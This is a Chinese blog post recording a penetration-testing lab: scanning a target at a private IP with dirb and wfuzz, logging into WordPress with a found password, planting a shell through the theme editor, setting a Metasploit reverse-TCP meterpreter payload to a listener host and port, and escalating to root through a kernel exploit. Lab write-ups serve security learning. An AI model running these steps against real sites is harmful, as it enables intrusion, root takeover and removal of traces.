渗透测试学习Day01

最新推荐文章于 2024-08-17 22:56:29 发布
最新推荐文章于 2024-08-17 22:56:29 发布
阅读量886 收藏
点赞数
分类专栏: 渗透测试 文章标签: php 网络 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43337731/article/details/127417637
版权

端口扫描结果
dirb http://192.168.184.131
http://192.168.184.131/dev
http://192.168.184.131/index.php
http://192.168.184.131/wordpress/index.php

dirb http://192.168.184.131 -X .txt,.php,.zip
http://192.168.184.131/image.php
http://192.168.184.131/index.php
http://192.168.184.131/secret.txt

进行模糊查询
wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hw 12 http://192.168.184.131/index.php?FUZZ
模糊查询

获得wordpress后台管理密码
follow_the_ippsec
wordpress后台登陆

wordpress博客管理后台存在“主题编辑器注入漏洞”。
主题编辑器

在其中发现可以用于编辑的php文件,考虑一句话木马或者反弹shell
可写入文件

为了能够权限维持,还是考虑建议反弹shell进行注入提权。
在这里插入图片描述

set payload php/meterpreter/reverse_tcp
设置反弹链接shell脚本
set lhost 192.168.184.12
设置连接到本机ip
set lport 9999
设置连接到本地端口9999
run
开始监听

成功通过执行反弹shell木马连接到目标主机
在这里插入图片描述

接下来就是进行提权操作啊,这里继续使用metasploit工具针对操作系统内核漏洞进行提权
在这里插入图片描述

得到该操作系统可能存在的漏洞信息。
在这里插入图片描述

成功编译对应攻击程序到桌面

在这里插入图片描述

然后利用meterpreter将攻击程序上传到靶机
在这里插入图片描述

给予提权程序权限并执行,发现此时用户为root用户,渗透成功,接下来即可进行痕迹擦除并撰写报告。

Stacey、D
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
渗透测试学习笔记_Day1
Sumarua的博客
06-17 583
拓展知识 APT (Advanced Package Tool,高级软件包工具)是一个打包管理 系统。APT允许使用命令行的方式,快速便捷地安装、更新、删除软件。 除了茴单以外,APT最大的优势是它可以自动解析软件之间的依赖关系。 也就是说,如果安装的软件包还需要其他软件,APT会自动地定位并安 装这个软件。这种自动解析软件依赖关系的 方法是对过去“依赖地狱” (dependency hell)的重大改进。 通过APT来安装软件非常直观。举例来说,假如你想安装网络映 射工具Cheops。只要你知道了想要安装
渗透测试学习笔记Day2
Sumarua的博客
06-19 456
侦察 1、内容简介 大部分时候,参加过黒客讲座或课程的人对若干安全工具都会有基本的 认识。很典型的例子是,这些学生可能曾经利用端口扫描工具对某一系统 进行过检査,或曾使用Wireshark来査看网络流景。其中有些人可能还玩过 Metasploit之类的漏洞利用工具。遗憾的是,如何在渗透测试过程中运用这 些工具,大部分初学者其实并不了解。也正因如此,他们的知识结构是不完 整的。如果能遵循一定的方法论,就等于有个方案在手,也就知道了下一步 该做什么。 为了强调使用并遵循某一方法论的重要性,通常描述一种场景来加以
学习网络安全 Day2 渗透测试基础
weixin_63351474的博客
09-12 237
渗透测试(Penetration Testing),就是一种通过模拟恶意攻击者的技术与方法,挫败目标系统安全控制措施,取得访问控制权,并发现具备业务影响后果安全隐患的一种安全测试与评估方法。渗透过程最主要的底层基础是目标系统中存在安全漏洞(指信息系统中存在的缺陷或不适当的配置,他们可使攻击者在未授权情况下访问或破坏系统,导致信息系统面临安全风险)。利用安全漏洞来造成入侵或破坏效果的程序就称为渗透代码(Exploit),或者漏洞利用代码。
渗透测试学习笔记
东方
07-06 437
1 越权漏洞 关键在于该表单 addressid等敏感字样 订单提交的功能点多有出现 2 cookie 越权 基本思路同上 3 csrf 跨站脚本攻击 主要是把前端的方法名抓包之后换个ID 其实相当于 还是越权漏洞的加强版 或是可以钓鱼用 自己觉得 可以钓鱼用 如果 他本地有存的session ,不小心点了这个URL直接登录执行操作 ...
渗透基础01day
weixin_46168073的博客
10-13 114
第一章:渗透测试基础 第一节:信息收集 实验步骤一: 任务描述: 在线查询whois信息。 使用工具查询whois信息。 实验任务一: 访问CNNIC,然后使用这个网页进行基本的信息收集。 比如我们搜索baidu.com.cn 结果如下。 那么,我们的第一个小任务就完成了。 实验任务二: 使用查询工具查询域名的信息。 下载whois查询工具Whois ThisDomain_2.05:下载地址:WhoisThisDom...
渗透测试概述
没有
08-31 4680
渗透测试概述 一:渗透测试标准与流程 1. 渗透测试概念 渗透测试是一种模拟攻击的技术与方法,挫败目标系统的安全控制措施并获取得到访问控制权的安全测试方法。 网络测试主要依据CVE***已经发现的安全漏洞***,模拟入侵者的攻击方法对网站应用,服务器系统和网络设备进行非破坏性质的攻击性测试 介绍:ms17-010(永恒之蓝)在CVE中编号CVE-2017-0146 2.渗透测试原则 渗透测试中的最大风险:测试过程中对业务产生的影响 合规性:符合规范和法律要求也是执行渗透测试业务的一个必要条件
渗透测试思路整理
闵行小鱼塘
07-02 5331
有些时候渗透测试搞着搞着就陷入了无解状态,不知道再从哪儿下手了,故对渗透测试思路做个整理,后续有新的见解持续更新
安全测试学习day two
weixin_43769170的博客
11-17 322
本博客仅作为学习之用,上课内容总结 安全测试 基于渗透测试的方法或基于模糊测试的方法完成安全软件的测试过程 1.安全测试概述 安全测试概念 反映真实的攻击情形 从攻击者角度出发,发现漏洞并修复,保证软件不被恶意攻击者破坏 分为安全功能测试和安全漏洞测试两个方面 安全功能测试:需要制定合理的测试策略,怎么生成能映射到所有子系统的测试用例 安全漏洞测试:致力于找出能够造成软件运行错误甚至导致用户遭到攻击的安全漏洞 功能测试: A.保密性测试 数据验证 加密算法验证 检测加密算法的强度 检测
渗透测试学习与实战阶段分析
m0_65606241的博客
05-07 709
初学接触阶段 很多刚接触渗透测试行业的小伙伴当你走出学院大门那一刻,有的时候会感觉到很迷茫,不知道渗透测试学完之后对未来的规划。 据我多年分析哈,得出啦一套自己的思想见解观点。 第一步呢 , 当然是先学习基本的渗透测试知识。 第二步,属于进阶阶段,不断地通过实战去总结在项目过程中做渗透测试哪些内容对我们的帮助最大。 第三步,从简分析,术业专精, ...
网站渗透思路总结
03-22
- 学习如何利用这些漏洞进行渗透测试,但务必遵守道德和法律规范。 #### 三、实战技巧 - **自动化与手工测试相结合**:结合使用自动化工具(如Web扫描器)和手动测试技术,以获得更全面的结果。 - **权限提升**:...
WX 0day上线CS.rar
04-21
Cobalt Strike是一款流行的红队工具,常用于模拟高级持续性威胁(APT)行为,进行渗透测试安全评估。 【描述】中的内容说明了这个压缩包里包含以下部分: 1、**脚本文件**:这些脚本可能是用于触发或利用WX 0day...
WEB框架0day漏洞的发掘及分析经验分享.pdf
09-11
《WEB框架0day漏洞的发掘及分析经验分享》 在当今的互联网环境中,Web框架扮演着至关重要的角色,它们为开发者提供了便捷的开发环境,...因此,开发者和安全专家都需要不断学习和研究,以应对日新月异的网络安全挑战。
51CTO-AIGC公开课Day01 v2-郑建勋
10-25
"51CTO-AIGC公开课Day01 v2-郑建勋" 在本课程中,郑建勋讲师带领我们探索了AI时代的巨变,并讨论了如何把握机会。通过技术发展的时间线,我们可以看到AI技术的发展历程,从图灵测试到Deep Blue和AlphaGo的胜利。...
5.12-第二天UPWEN-HCIA Datacom-使用telnetlib.mp4
06-27
想要了解更多 大家可以关注我, 我会定期给大家更新学习视频
37_DC-5靶机渗透测试、nmap使用、kail漏洞库使用、系统提权、反弹shell到kali、留后门、蚁剑连接webshell、文件包含漏洞利用、NC用法
weixin_54591045的博客
08-15 597
知识点:web的、Linux、系统命令、Python kail漏洞库使用、系统提权、反弹shell到kali、留后门、蚁剑连接webshell、文件包含漏洞利用
多媒体技术及应用课程思政网站
m0_73706453的博客
08-15 622
在Internet高速发展的今天,我们生活的各个领域都涉及到计算机的应用,其中包括多媒体技术及应用课程思政网站的网络应用,在外国多媒体技术及应用课程思政已经是很普遍的方式,不过国内的多媒体技术及应用课程思政可能还处于起步阶段。多媒体技术及应用课程思政网站具有学习音频功能。多媒体技术及应用课程思政网站采用PHP语言,Thinkphp5框架,基于mysql开发,实现了首页、个人中心、学生管理、教师管理、课程分类管理、学习视频管理、学习课程管理、学习音频管理、课程笔记管理、反馈留言、系统管理等内容进行管理,本系
思科RIP动态路由配置3
2302_76730689的博客
08-14 679
路由信息协议(Routing Information Protocol,RIP)是应用较早、使用较普遍的动态路由协议,也是内部网关协议,由于RIP以跳数作为衡量路径的开销,且规定最大跳数为15,因此RIP在实际应用中是有一定限制的,通常适用于中小型的企业网络。Router-A(config-router)#network 网段!#9查看Switch-A、Router-A、Router-B的路由表。#3配置Router-A的名称及其接口IP地址。#7在Router-A上配置动态RIP。
wordpress网站“ERR_CONNECTION_REFUSED”错误
最新发布
xiaoyuya
08-17 273
wordpress网站“ERR_CONNECTION_REFUSED”错误,是一个常见的wordpress错误。通过以上步骤,你应该能够诊断并解决WordPress中的“ERR_CONNECTION_REFUSED”错误。例如,最新的WordPress可能不支持PHP5.2,必须升级到PHP5.5或更高版本。如果WordPress无法连接到数据库,也会导致类似的错误。如果你使用的是云服务器,可以尝试重启服务器来解决问题。如果连接没有问题,尝试重新启动路由器或重新连接网络。有时浏览器缓存可能导致连接问题。
"网络安全、Web安全渗透测试笔试总结以及常见面试题目概述
以上是笔试中涉及的面试题目,对网络安全、Web安全渗透测试等相关的常见知识进行了涵盖和总结。这些题目涵盖了网络安全的基础知识、漏洞利用、攻击手段和防御技术等方面内容。同时,这些题目也对应聘者的知识储备...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值